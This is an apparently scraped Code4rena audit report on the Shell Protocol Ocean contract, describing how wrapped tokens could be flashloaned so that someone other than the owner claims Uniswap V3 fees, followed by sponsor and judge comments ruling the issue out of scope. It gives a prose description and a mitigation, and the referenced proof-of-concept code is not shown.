Closed c4-bot-6 closed 10 months ago
raymondfam marked the issue as sufficient quality report
raymondfam marked the issue as primary issue
May be OOS since all possible attack paths should be directed to the in-scope Curve adapters.
viraj124 (sponsor) disputed
viraj124 marked the issue as disagree with severity
this would come under the category of malicious adapters we mentioned in the known issues, once we allow adapters to be deployed in permissionless
way then users are responsible for interacting with these type of malicious primitives so would mark this as qa at best
0xA5DF marked the issue as unsatisfactory: Out of scope
It was mentioned that malicious adapters are out of scope but this implementation allows to harm not the caller but the other users.
I agree with the sponsor, I don't see why this should be an exception to the known issue
Lines of code
https://github.com/code-423n4/2023-11-shellprotocol/blob/485de7383cdf88284ee6bcf2926fb7c19e9fb257/src/ocean/Ocean.sol#L745
Vulnerability details
The Ocean contract allows to flashloan any tokens that were transferred to the Ocean contract. For example, this interaction allows
adapter
to usewrappedToken
in any way provided he returns them afterward:It might be fine for some tokens but not in general. Some tokens might have utility functions that should be accessible only to the owners of the tokens. It can be some governance, membership, or economic features of the tokens. For example, the owner of the Uniswap V3 position can claim fees and this function should not be accessible to everyone. The current implementation of the Ocean allows anyone to use these functions.
Impact
Anyone can use the utility functions of any tokens owned by the
Ocean
.Proof of Concept
To illustrate this let's consider the following implementation of the malicious adapter. It was mentioned that malicious adapters are out of scope but this implementation allows to harm not the caller but the other users. This adapter basically allows to collect Uniswap V3 fees without the owner's permission.
The test below illustrates that anyone can claim Uniswap V3 fees without the owner's permission.
Tools Used
Manual Review
Recommended Mitigation Steps
Consider informing users that any tokens that have utility functions should not be wrapped using the
Ocean
contract.Assessed type
Other